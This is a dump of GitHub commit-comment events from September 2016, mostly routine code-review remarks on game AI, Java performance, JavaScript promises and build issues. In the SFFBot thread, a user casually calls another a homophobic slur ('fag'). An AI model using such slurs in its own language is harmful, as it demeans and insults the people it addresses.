{"id":"4555243161","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000537,"position":null,"line":null,"path":null,"commit_id":"a880d87464f1c8360be3f3998c7fb4e3fe0b19e8","created_at":"2016-09-13T12:24:21Z","updated_at":"2016-09-13T12:24:21Z","body":"Okay, the issue is that skills that possess as pet, those skills that take over something else, not to mind control it, but to dominate it, those no longer use PetAI (how could they given we changed the AISelector), so basically they go through the same functionalities as a mind controlled unit while they should go through much of the same as a pet goes through, since that's what they're turned into temporarily."}},"created_at":"2016-09-13T12:24:21Z"}
{"id":"4555244357","type":"CommitCommentEvent","actor":{"login":"mhengelein"},"repo":{"name":"RedFroggy/swagger2-angular2-materialize"},"payload":{"comment":{"id":19000543,"position":null,"line":null,"path":null,"commit_id":"ed3d72fba5a2478d53aa398a9065c6503b398ac3","created_at":"2016-09-13T12:24:36Z","updated_at":"2016-09-13T12:24:36Z","body":"Thank you Michael, appreciate it!"}},"created_at":"2016-09-13T12:24:36Z"}
{"id":"4555246501","type":"CommitCommentEvent","actor":{"login":"Speaqer"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":19000548,"position":12,"line":37,"path":"SFFBot/Forms/HotkeyFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T12:25:03Z","updated_at":"2016-09-13T12:25:03Z","body":"Shut up fag"}},"created_at":"2016-09-13T12:25:03Z"}
{"id":"4555250590","type":"CommitCommentEvent","actor":{"login":"Speaqer"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":19000559,"position":85,"line":99,"path":"SFFBot/Forms/SplashFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T12:25:53Z","updated_at":"2016-09-13T12:25:53Z","body":"who cares, i prob wont even use it like that anymore i remember right"}},"created_at":"2016-09-13T12:25:53Z"}
{"id":"4555252349","type":"CommitCommentEvent","actor":{"login":"fantasymaker-cn"},"repo":{"name":"sjdy521/Mojo-Webqq"},"payload":{"comment":{"id":19000566,"position":17,"line":41,"path":"lib/Mojo/Webqq/Plugin/FuckAndroid.pm","commit_id":"1672210ec7aa9123b175e4bb7773c4144ee3b792","created_at":"2016-09-13T12:26:17Z","updated_at":"2016-09-13T12:26:17Z","body":"🍻 真可怜"}},"created_at":"2016-09-13T12:26:17Z"}
{"id":"4555254282","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19000568,"position":150,"line":200,"path":"core/src/main/java/org/renjin/stats/internals/distributions/RNG.java","commit_id":"d98ee2274cf4e688d30eedcdadf893308797f901","created_at":"2016-09-13T12:26:42Z","updated_at":"2016-09-13T12:26:42Z","body":"So if n.length() == 0 you allocate the memory twice? Change the order of these statements."}},"created_at":"2016-09-13T12:26:42Z"}
{"id":"4555255953","type":"CommitCommentEvent","actor":{"login":"Speaqer"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":19000576,"position":186,"line":174,"path":"SFFBot/MainFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T12:27:04Z","updated_at":"2016-09-13T12:27:04Z","body":"u wot fag, i use x and y later in code.."}},"created_at":"2016-09-13T12:27:04Z"}
{"id":"4555260043","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000584,"position":5,"line":30,"path":"src/game/AI/AggressorAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T12:27:52Z","updated_at":"2016-09-13T12:27:52Z","body":"Well, my argument is that to mean it's more readable because in my mind, I see it as this:\r\n\r\nNot A and not B. Sure, that's simple, but not as simple as:\r\n\r\nNot A or B.\r\n\r\nAlso, it's a logical operation less (1 or + not vs 2 not + and)\r\n\r\nBut you are right, this is a matter of personal preference, I just can't leave something like this be if I see that it can be simplified."}},"created_at":"2016-09-13T12:27:52Z"}
{"id":"4555261089","type":"CommitCommentEvent","actor":{"login":"reshma-dhomse"},"repo":{"name":"sangle-umesh/faketask"},"payload":{"comment":{"id":19000585,"position":39,"line":39,"path":"test/ViewController.swift","commit_id":"614a2467996a4cb59c16bee9eb4e6687901f8a4f","created_at":"2016-09-13T12:28:04Z","updated_at":"2016-09-13T12:28:04Z","body":"test"}},"created_at":"2016-09-13T12:28:04Z"}
{"id":"4555261101","type":"CommitCommentEvent","actor":{"login":"notmika"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":19000586,"position":12,"line":37,"path":"SFFBot/Forms/HotkeyFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T12:28:05Z","updated_at":"2016-09-13T12:28:05Z","body":"Hahahaha ily too\n\nOn Sep 13, 2016 14:25, \"Speaqer\" <notifications@github.com> wrote:\n>\n> Shut up fag\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2016-09-13T12:28:05Z"}
{"id":"4555261641","type":"CommitCommentEvent","actor":{"login":"gokulnaht"},"repo":{"name":"gokulnaht/V.A.A.S"},"payload":{"comment":{"id":19000588,"position":null,"line":null,"path":null,"commit_id":"7453677b5bd18d36b9fa3f42dc7edede8c72b91e","created_at":"2016-09-13T12:28:11Z","updated_at":"2016-09-13T12:28:11Z","body":"hello"}},"created_at":"2016-09-13T12:28:11Z"}
{"id":"4555266169","type":"CommitCommentEvent","actor":{"login":"Speaqer"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":19000596,"position":287,"line":213,"path":"SFFBot/MainFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T12:29:04Z","updated_at":"2016-09-13T12:29:04Z","body":"idk why i left that there but that was going to be one of the my index detection thingys, but umm https://gyazo.com/d9948bf6a92ffb80a570735f64e0edcc"}},"created_at":"2016-09-13T12:29:04Z"}
{"id":"4555269758","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000610,"position":16,"line":47,"path":"src/game/AI/AggressorAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T12:29:44Z","updated_at":"2016-09-13T12:29:44Z","body":"The reason why I add the operators on the line below and not the line above is because I think it can be misleading the other way, because you may read a line which is part of the if statements as a call while it was merely a part of the argument. That's all I did here."}},"created_at":"2016-09-13T12:29:44Z"}
{"id":"4555270114","type":"CommitCommentEvent","actor":{"login":"asurinov"},"repo":{"name":"asurinov/music.pekadev"},"payload":{"comment":{"id":19000611,"position":null,"line":null,"path":null,"commit_id":"e09f176f42bdc70e12bc9f10214d337e500f7aad","created_at":"2016-09-13T12:29:49Z","updated_at":"2016-09-13T12:29:49Z","body":"Closes #3 "}},"created_at":"2016-09-13T12:29:49Z"}
{"id":"4555270821","type":"CommitCommentEvent","actor":{"login":"k9ert"},"repo":{"name":"hybris/zenboot"},"payload":{"comment":{"id":19000614,"position":4,"line":3,"path":".travis.yml","commit_id":"cb5657aa44b5565e65150df94969afbb11b81c4f","created_at":"2016-09-13T12:29:56Z","updated_at":"2016-09-13T12:29:56Z","body":"i liked openjdk. I'm fine with oraclejdk as well but any reasoning for switching?"}},"created_at":"2016-09-13T12:29:56Z"}
{"id":"4555271720","type":"CommitCommentEvent","actor":{"login":"Speaqer"},"repo":{"name":"Speaqer/SFFBot"},"payload":{"comment":{"id":19000617,"position":287,"line":213,"path":"SFFBot/MainFrm.cs","commit_id":"8ba42e1de2426d168e4570d43939caf957be75c1","created_at":"2016-09-13T12:30:08Z","updated_at":"2016-09-13T12:30:08Z","body":"lmao idk what github is doing but i didn't have those codes in that commit\r\nwhen i pushed it.."}},"created_at":"2016-09-13T12:30:08Z"}
{"id":"4555272010","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19000618,"position":157,"line":205,"path":"core/src/main/java/org/renjin/stats/internals/distributions/RNG.java","commit_id":"d98ee2274cf4e688d30eedcdadf893308797f901","created_at":"2016-09-13T12:30:12Z","updated_at":"2016-09-13T12:30:12Z","body":"Simplify to `j++`. The call to SEXP.length() is an order of magnitude more expensive than the `j++` that you are trying to avoid.\r\n\r\nFollow with length check. If we want to optimize this for the case of n.length() == 1, I think we would need to write a second loop. Here there are too many virtual calls to make a difference. For example, you could write:\r\n\r\n```\r\nif(n.length() == 1) {\r\n  // Fast case\r\n  double nValue = n.getElementAsDouble(0);\r\n  for(int i=0;i<nn;++i) {\r\n    vb.add(Signrank.rsignrank(context.getSession(), nValue));\r\n  }\r\n} else {\r\n  // Recycling...\r\n int ni=0;\r\n for(int i=0;i<nn;++i) {\r\n   vb.add(Signrank.rsignrank(context.getSession(), n.getElementAsDouble(ni));\r\n   ni++;\r\n   if(ni > n.length()) {\r\n     ni = 0;\r\n   }\r\n }\r\n}\r\n```\r\n\r\nBut the JVM can be pretty good at this sort of thing so I wouldn't add any optimizations before doing some profiling."}},"created_at":"2016-09-13T12:30:12Z"}
{"id":"4555272604","type":"CommitCommentEvent","actor":{"login":"sjdy521"},"repo":{"name":"sjdy521/Mojo-Webqq"},"payload":{"comment":{"id":19000619,"position":17,"line":41,"path":"lib/Mojo/Webqq/Plugin/FuckAndroid.pm","commit_id":"1672210ec7aa9123b175e4bb7773c4144ee3b792","created_at":"2016-09-13T12:30:20Z","updated_at":"2016-09-13T12:30:20Z","body":"没看懂 哪里可怜啦～\n\n\n发自 网易邮箱大师\n在2016年09月13日 20:26，fantasymaker 写道:\n\n🍻 真可怜\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-13T12:30:20Z"}
{"id":"4555272763","type":"CommitCommentEvent","actor":{"login":"bergus"},"repo":{"name":"tc39/proposal-cancelable-promises"},"payload":{"comment":{"id":19000620,"position":13,"line":13,"path":"with-cancel-token.js","commit_id":"e4b865c7567cc626d9bb460eee2babd4a903f86e","created_at":"2016-09-13T12:30:21Z","updated_at":"2016-09-13T12:30:21Z","body":"You could just change this line to\r\n```js\r\nconst cancelAction = executor(result => {\r\n    cancelAction = undefined;\r\n    resolve(result);\r\n}, reason => {\r\n    cancelAction = undefined;\r\n    reject(reason);\r\n});\r\n```\r\nand there would be no need to delete this file"}},"created_at":"2016-09-13T12:30:21Z"}
{"id":"4555275342","type":"CommitCommentEvent","actor":{"login":"JosephSilber"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19000623,"position":null,"line":null,"path":null,"commit_id":"6dfc0229b2f4ec4d72bf7361d7e81ff62e5d4b5e","created_at":"2016-09-13T12:30:45Z","updated_at":"2016-09-13T12:30:45Z","body":"You customize it in the global exception handler's \"unauthenticated\" method.\n\nhttps://josephsilber.com/posts/2016/07/10/authentication-improvements-in-laravel-5-3#the-exception-handlers-unauthenticated-method\n"}},"created_at":"2016-09-13T12:30:45Z"}
{"id":"4555275185","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":19000624,"position":162,"line":162,"path":"drivers/input/touchscreen/wake_gestures.c","commit_id":"a121b245eddb5bb12cf0385c29edd298e10137c1","created_at":"2016-09-13T12:30:48Z","updated_at":"2016-09-13T12:30:48Z","body":"It vibrates, but the vibration value is too low:\r\n\r\n> #define VIB_STRENGTH \t\t20\r\n\r\nI set it to 75 and vibrating good."}},"created_at":"2016-09-13T12:30:48Z"}
{"id":"4555280088","type":"CommitCommentEvent","actor":{"login":"atchertchian"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19000633,"position":87,"line":87,"path":"nuxeo-services/nuxeo-platform-query-api/src/main/java/org/nuxeo/ecm/platform/query/core/QuickFilterDescriptor.java","commit_id":"cc9683727b9f82f2dfa0d49fba30168e258f5a77","created_at":"2016-09-13T12:31:51Z","updated_at":"2016-09-13T12:31:51Z","body":"sortInfo.clone()?"}},"created_at":"2016-09-13T12:31:51Z"}
{"id":"4555282780","type":"CommitCommentEvent","actor":{"login":"ratiw"},"repo":{"name":"ratiw/vue-table"},"payload":{"comment":{"id":19000641,"position":null,"line":null,"path":null,"commit_id":"a40a44ef3a03a6ad8cf0b3271d6afa0f11b94377","created_at":"2016-09-13T12:32:25Z","updated_at":"2016-09-13T12:32:25Z","body":"@GavinHao Thanks for reporting this. The problem is actually on the `v-else` line. Will make a patch for it and push it up shortly."}},"created_at":"2016-09-13T12:32:25Z"}
{"id":"4555283789","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000643,"position":61,"line":142,"path":"src/game/AI/AggressorAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T12:32:38Z","updated_at":"2016-09-13T12:32:38Z","body":"This is adding threat manually, I just thought it was a bit unnessesary, don't we add more than enough threat during the update attacker stance functions?"}},"created_at":"2016-09-13T12:32:38Z"}
{"id":"4555284159","type":"CommitCommentEvent","actor":{"login":"Moyster"},"repo":{"name":"Deepflex/android_device_elephone_p9000"},"payload":{"comment":{"id":19000644,"position":null,"line":null,"path":null,"commit_id":"4aa3a6bed1715ad370a3eb686b0b2553d4f85386","created_at":"2016-09-13T12:32:43Z","updated_at":"2016-09-13T12:32:43Z","body":"$ pwd\r\n/media/cyanogen/marshmallow/frameworks/native/build\r\n$ ls |grep xxhdpi-4096\r\nphone-xxxhdpi-4096-dalvik-heap.mk\r\nphone-xxxhdpi-4096-hwui-memory.mk\r\n\r\nthere's a missing X, triple X, not double for the 4gb files :)"}},"created_at":"2016-09-13T12:32:43Z"}
{"id":"4555289020","type":"CommitCommentEvent","actor":{"login":"frodrigo"},"repo":{"name":"fab-girard/mapotempo-web"},"payload":{"comment":{"id":19000649,"position":4,"line":46,"path":"app/api/v01/entities/customer.rb","commit_id":"dbd36473b5cb7745e7056538a9cba712357aec8a","created_at":"2016-09-13T12:33:46Z","updated_at":"2016-09-13T12:33:46Z","body":"+ desc: EDIT_ONLY_ADMIN"}},"created_at":"2016-09-13T12:33:46Z"}
{"id":"4555290538","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000657,"position":5,"line":36,"path":"src/game/AI/CreatureAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T12:34:05Z","updated_at":"2016-09-13T12:34:05Z","body":"This was a typo, this was actually not supposed to have changed. Thanks for noticing. If we already have a victim we don't care about a new attacker (at least initially)"}},"created_at":"2016-09-13T12:34:05Z"}
{"id":"4555296321","type":"CommitCommentEvent","actor":{"login":"wkentaro"},"repo":{"name":"jsk-ros-pkg/jsk_recognition"},"payload":{"comment":{"id":19000668,"position":4,"line":69,"path":"jsk_perception/package.xml","commit_id":"025489b586723524cde89b8245c52dd915e193ba","created_at":"2016-09-13T12:35:15Z","updated_at":"2016-09-13T12:35:15Z","body":"sorry..\n\n2016年9月13日火曜日、Kei Okada<notifications@github.com>さんは書きました:\n\n> pip!!!!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jsk-ros-pkg/jsk_recognition/commit/025489b586723524cde89b8245c52dd915e193ba#commitcomment-18997558>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEHFk8QvTtbd-Gho68b6ayQ4SjgBbVNwks5qplsYgaJpZM4J7Zwy>\n> .\n>\n\n\n-- \n和田 健太郎 / Kentaro Wada\nhttp://wkentaro.com\n"}},"created_at":"2016-09-13T12:35:15Z"}
{"id":"4555296770","type":"CommitCommentEvent","actor":{"login":"williewillus"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19000669,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T12:35:20Z","updated_at":"2016-09-13T12:35:20Z","body":"If we're going to debate this we're better off on the Reddit thread than on the comments of a commit"}},"created_at":"2016-09-13T12:35:20Z"}
{"id":"4555297813","type":"CommitCommentEvent","actor":{"login":"hyperreality"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":19000673,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-13T12:35:33Z","updated_at":"2016-09-13T12:35:33Z","body":"But what if people want 0 or 1 optional tests, or add more of their own? I think you should make the progress bar dynamically adjustable along the lines I suggested. In terms of colours, a two-colour scheme for failure and success is just as good IMO and then you don't have to hardcode anything."}},"created_at":"2016-09-13T12:35:33Z"}
{"id":"4555299322","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"encukou/portingguide"},"payload":{"comment":{"id":19000675,"position":null,"line":null,"path":null,"commit_id":"2be4c6cd6c93a4b0f8a75968e35f815ed35394f0","created_at":"2016-09-13T12:35:52Z","updated_at":"2016-09-13T12:35:52Z","body":"Ah, right! I was using an old version of modernize..."}},"created_at":"2016-09-13T12:35:52Z"}
{"id":"4555300115","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000676,"position":14,"line":147,"path":"src/game/AI/CreatureAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T12:36:01Z","updated_at":"2016-09-13T12:36:01Z","body":"Yeah but this is not only for units in a temporary state of no movement, this is also for creatures who are born with no movement.\r\n\r\nlike for instance the target dummies."}},"created_at":"2016-09-13T12:36:01Z"}
{"id":"4555300159","type":"CommitCommentEvent","actor":{"login":"leskal"},"repo":{"name":"Deepflex/android_device_elephone_p9000"},"payload":{"comment":{"id":19000677,"position":null,"line":null,"path":null,"commit_id":"4aa3a6bed1715ad370a3eb686b0b2553d4f85386","created_at":"2016-09-13T12:36:01Z","updated_at":"2016-09-13T12:36:01Z","body":"thank you, its fixed"}},"created_at":"2016-09-13T12:36:01Z"}
{"id":"4555301503","type":"CommitCommentEvent","actor":{"login":"frodrigo"},"repo":{"name":"fab-girard/mapotempo-web"},"payload":{"comment":{"id":19000680,"position":14,"line":936,"path":"config/locales/fr.yml","commit_id":"dbd36473b5cb7745e7056538a9cba712357aec8a","created_at":"2016-09-13T12:36:18Z","updated_at":"2016-09-13T12:36:18Z","body":"Not in english yml"}},"created_at":"2016-09-13T12:36:18Z"}
{"id":"4555303200","type":"CommitCommentEvent","actor":{"login":"Moyster"},"repo":{"name":"Deepflex/android_device_elephone_p9000"},"payload":{"comment":{"id":19000685,"position":null,"line":null,"path":null,"commit_id":"4aa3a6bed1715ad370a3eb686b0b2553d4f85386","created_at":"2016-09-13T12:36:39Z","updated_at":"2016-09-13T12:36:39Z","body":"np, thank you for what you're doing so far ;)"}},"created_at":"2016-09-13T12:36:39Z"}
{"id":"4555305870","type":"CommitCommentEvent","actor":{"login":"gargankur74"},"repo":{"name":"gargankur74/learnMe"},"payload":{"comment":{"id":19000689,"position":null,"line":null,"path":null,"commit_id":"30a4391f8a869bfa99dbf64cc18f655b388bb2dd","created_at":"2016-09-13T12:37:15Z","updated_at":"2016-09-13T12:37:15Z","body":"Good work :)"}},"created_at":"2016-09-13T12:37:15Z"}
{"id":"4555308303","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19000694,"position":null,"line":null,"path":null,"commit_id":"e8f41e0565f610b1b30dd4aab8f13230a373f1e1","created_at":"2016-09-13T12:37:46Z","updated_at":"2016-09-13T12:37:46Z","body":"Issue number #666 "}},"created_at":"2016-09-13T12:37:46Z"}
{"id":"4555308656","type":"CommitCommentEvent","actor":{"login":"gargankur74"},"repo":{"name":"gargankur74/learnMe"},"payload":{"comment":{"id":19000695,"position":null,"line":null,"path":null,"commit_id":"30a4391f8a869bfa99dbf64cc18f655b388bb2dd","created_at":"2016-09-13T12:37:50Z","updated_at":"2016-09-13T12:37:50Z","body":"Now go ahead with the file i uploaded."}},"created_at":"2016-09-13T12:37:50Z"}
{"id":"4555308716","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000696,"position":14,"line":46,"path":"src/game/AI/GuardianAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T12:37:50Z","updated_at":"2016-09-13T12:37:50Z","body":"That one right there I actually don't know why I changed like that O.o"}},"created_at":"2016-09-13T12:37:50Z"}
{"id":"4555310438","type":"CommitCommentEvent","actor":{"login":"lassoan"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":19000701,"position":68,"line":911,"path":"Libs/MRML/Core/vtkMRMLStorageNode.cxx","commit_id":"cfdf8cc590450e5bcbe13b75c9cc6a9b5019883e","created_at":"2016-09-13T12:38:14Z","updated_at":"2016-09-13T12:38:14Z","body":"Good catch! \"All files\" entry should only be added if the subclass does not override InitializeSupportedReadFileTypes(). I'll run tests and commit a fix. It would be great if you could add a test that checks this case to make sure this does not break in the future. Thanks!"}},"created_at":"2016-09-13T12:38:14Z"}
{"id":"4555310823","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-interactive-video"},"payload":{"comment":{"id":19000702,"position":null,"line":null,"path":null,"commit_id":"d9547ac4bd3204da49a30d76b34b4d34da22b12d","created_at":"2016-09-13T12:38:19Z","updated_at":"2016-09-13T12:38:19Z","body":"Why do we need to disable the editor when it's less than 640px? \r\nAppears to be working fine with response designs at my end."}},"created_at":"2016-09-13T12:38:19Z"}
{"id":"4555314293","type":"CommitCommentEvent","actor":{"login":"chq901226"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19000710,"position":392,"line":392,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-13T12:39:05Z","updated_at":"2016-09-13T12:39:05Z","body":"你这是在炫技，😏哼哼哼。"}},"created_at":"2016-09-13T12:39:05Z"}
{"id":"4555315099","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000713,"position":20,"line":51,"path":"src/game/AI/GuardianAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T12:39:15Z","updated_at":"2016-09-13T12:39:15Z","body":"Well, given how our AISelector chooses the AI then we gonna have to do some additional checks there then, or else they will end up with GuardianAI, because they very much are considered a pet, no?"}},"created_at":"2016-09-13T12:39:15Z"}
{"id":"4555317340","type":"CommitCommentEvent","actor":{"login":"NzV"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":19000722,"position":2,"line":1,"path":"POGOProtos","commit_id":"5a0fa96e49ee78c6efb54ab1d9d16ee41281ccf8","created_at":"2016-09-13T12:39:43Z","updated_at":"2016-09-13T12:39:43Z","body":"Why roll back to the old version who wont compile ?\r\n\r\nhttps://ci.appveyor.com/project/NzV/necrobot/build/0.0.0.174\r\n\r\nC:\\Program Files (x86)\\MSBuild\\14.0\\bin\\Microsoft.Common.CurrentVersion.targets(1820,5): warning MSB3245: Could not resolve this reference. Could not locate the assembly \"Google.Protobuf, Version=3.0.0.0, Culture=neutral, PublicKeyToken=a7d26565bac4d604, processorArchitecture=MSIL\". Check to make sure the assembly exists on disk. If this reference is required by your code, you may get compilation errors. [C:\\projects\\necrobot2\\POGOProtos\\POGOProtos.csproj]\r\n"}},"created_at":"2016-09-13T12:39:43Z"}
{"id":"4555321733","type":"CommitCommentEvent","actor":{"login":"daniel-j-h"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":19000731,"position":null,"line":null,"path":null,"commit_id":"f8d33ea841067e15ed9716dde772587b92ebf323","created_at":"2016-09-13T12:40:36Z","updated_at":"2016-09-13T12:40:36Z","body":"@karenzshea once you force push Github will lose all the commends here. That's the reason we open Pull Requests as early as possible and discuss there.\r\n\r\nIf you want to write tests here are two scenarios making use of the edge speed file:\r\n- https://github.com/Project-OSRM/osrm-backend/blob/master/features/car/traffic_speeds.feature\r\n- https://github.com/Project-OSRM/osrm-backend/blob/master/features/options/contract/datasources.feature"}},"created_at":"2016-09-13T12:40:36Z"}
{"id":"4555324349","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"encukou/portingguide"},"payload":{"comment":{"id":19000740,"position":null,"line":null,"path":null,"commit_id":"2be4c6cd6c93a4b0f8a75968e35f815ed35394f0","created_at":"2016-09-13T12:41:09Z","updated_at":"2016-09-13T12:41:09Z","body":"Hm, this is unfortunate -- modernize 0.5 will not fix (or mark) code like:\r\n\r\n```\r\nfor key in somedict.keys():\r\n    del somedict[key]\r\n```\r\n\r\nwhich is definitely something I've seen before."}},"created_at":"2016-09-13T12:41:09Z"}
{"id":"4555327065","type":"CommitCommentEvent","actor":{"login":"veetox"},"repo":{"name":"BecomingPizza/hello-world"},"payload":{"comment":{"id":19000749,"position":3,"line":1,"path":"README.md","commit_id":"28ab0f85761da0d34bcdbff41b804738811369bc","created_at":"2016-09-13T12:41:40Z","updated_at":"2016-09-13T12:41:40Z","body":"This is very helpful information on how am repository\r\n"}},"created_at":"2016-09-13T12:41:40Z"}
{"id":"4555328581","type":"CommitCommentEvent","actor":{"login":"eoghan2t9"},"repo":{"name":"Nyks45/OctoDex-Kernel"},"payload":{"comment":{"id":19000756,"position":null,"line":null,"path":null,"commit_id":"d6066525fc4e96cd6ce180922f2e47c5363f039e","created_at":"2016-09-13T12:41:58Z","updated_at":"2016-09-13T12:41:58Z","body":"Don't normally do this however could you add back in credit to myself for making the auto build and packing script. As you can see here on line 4\r\n\r\nhttps://github.com/Zenfone2-Dev/kernel-FlareM/blob/cm-13.0/buildzf2\r\n\r\nYes I understand you have edited the script for you own needs however original credit would have been nice too be left in the script and not deleted."}},"created_at":"2016-09-13T12:41:58Z"}
{"id":"4555329070","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"ForestryMC/ForestryMC"},"payload":{"comment":{"id":19000759,"position":null,"line":null,"path":null,"commit_id":"79c56311c2a3d3e7b3326044e58f0cee50474380","created_at":"2016-09-13T12:42:05Z","updated_at":"2016-09-13T12:42:05Z","body":"RF/Tesla are optional for Forestry? Then how tooltips will looks like? Cause there is no name for `net.minecraftforge.energy` right now."}},"created_at":"2016-09-13T12:42:05Z"}
{"id":"4555336551","type":"CommitCommentEvent","actor":{"login":"ThomHPL"},"repo":{"name":"ThomHPL/BaseI6_updater"},"payload":{"comment":{"id":19000794,"position":null,"line":null,"path":null,"commit_id":"36dba9410fb5a07dbc9c14da1b4f2f43a3aee63a","created_at":"2016-09-13T12:43:30Z","updated_at":"2016-09-13T12:43:30Z","body":"@impressiver I've uploaded the code"}},"created_at":"2016-09-13T12:43:30Z"}
{"id":"4555338725","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"gtejasvi/stick2code"},"payload":{"comment":{"id":19000797,"position":null,"line":null,"path":null,"commit_id":"d1a29a979b04266b613662f055737ad8261580db","created_at":"2016-09-13T12:43:55Z","updated_at":"2016-09-13T12:43:55Z","body":"Thanks for this, really helpful.\r\nJust a comment. When calling `encryptPinBlock `multiple times, I had to initialize Cipher like this:\r\n```\r\nIvParameterSpec ivParameters = new IvParameterSpec(new byte[] { 12, 34, 56, 78, 90, 87, 65, 43 });\r\ncipher.init(Cipher.ENCRYPT_MODE, secretKey, ivParameters);\r\n```\r\nto get the same encrypted PIN block for the same `cardNumber `and `pin`."}},"created_at":"2016-09-13T12:43:55Z"}
{"id":"4555339057","type":"CommitCommentEvent","actor":{"login":"p4x3c0"},"repo":{"name":"p4x3c0/PedalPi-Display-View"},"payload":{"comment":{"id":19000798,"position":null,"line":null,"path":null,"commit_id":"8a48a14553c341dce9068652f3b11466a5259e14","created_at":"2016-09-13T12:43:59Z","updated_at":"2016-09-13T12:43:59Z","body":"tela 1 : patch atual"}},"created_at":"2016-09-13T12:43:59Z"}
{"id":"4555339510","type":"CommitCommentEvent","actor":{"login":"iamprabhat"},"repo":{"name":"iamprabhat/iamprabhat.github.io"},"payload":{"comment":{"id":19000801,"position":null,"line":null,"path":null,"commit_id":"eb8a780c1faef2626af8e001dc48274356f7e6e9","created_at":"2016-09-13T12:44:05Z","updated_at":"2016-09-13T12:44:05Z","body":"How to Call Normalize?\r\n`@include normalize();`\r\n\r\n**Note:** All the rules and it's declarations written in — `normalize()` mixin."}},"created_at":"2016-09-13T12:44:05Z"}
{"id":"4555344238","type":"CommitCommentEvent","actor":{"login":"p4x3c0"},"repo":{"name":"p4x3c0/PedalPi-Display-View"},"payload":{"comment":{"id":19000808,"position":null,"line":null,"path":null,"commit_id":"8a48a14553c341dce9068652f3b11466a5259e14","created_at":"2016-09-13T12:45:02Z","updated_at":"2016-09-13T12:45:02Z","body":"Todas telas feitas estaticamente, sem leitura do Json.\r\nTela 1 : patch atual\r\nTela 2 : Lista de plugins\r\nTela 3 : Lista de parâmetros"}},"created_at":"2016-09-13T12:45:02Z"}
